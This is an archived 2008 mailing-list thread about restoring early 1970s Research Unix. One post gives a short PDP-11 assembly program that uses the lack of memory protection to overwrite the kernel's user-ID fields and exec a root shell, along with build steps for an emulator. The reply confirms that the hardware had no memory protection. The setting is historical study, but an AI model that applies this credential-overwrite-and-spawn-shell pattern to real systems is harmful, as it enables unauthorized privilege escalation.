* [Unix-jun72] another small hack
@ 2008-05-10 18:37 Tim Newsham
2008-05-11 9:33 ` Warren Toomey
0 siblings, 1 reply; 2+ messages in thread
From: Tim Newsham @ 2008-05-10 18:37 UTC (permalink / raw)
No memory protection:
.. = 40014
mov $0,037772 / u.uid = 0, u.ruid = 0
sys exec; shell; shellp
sys exit
shell: </bin/sh\0>
shellm: <-\0>
shellp: shellm
0
-----
$ APOUT_ROOT=../fs/root ../tools/apout/apout ../fs/root/bin/as hack.s
$ ../tools/fixaout.py
$ mv b.out hack
... put it on your rk0 as /bin/hack, login as bin, run "hack".
Tim Newsham
http://www.thenewsh.com/~newsham/
^ permalink raw reply [flat|nested] 2+ messages in thread
* [Unix-jun72] another small hack
2008-05-10 18:37 [Unix-jun72] another small hack Tim Newsham
@ 2008-05-11 9:33 ` Warren Toomey
0 siblings, 0 replies; 2+ messages in thread
From: Warren Toomey @ 2008-05-11 9:33 UTC (permalink / raw)
On Sat, May 10, 2008 at 08:37:33AM -1000, Tim Newsham wrote:
> No memory protection:
No, the 11/20 didn't have memory protection.
I'm back from a few days away. Will send some answers in soon.
Warren
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2008-05-11 9:33 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2008-05-10 18:37 [Unix-jun72] another small hack Tim Newsham
2008-05-11 9:33 ` Warren Toomey
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).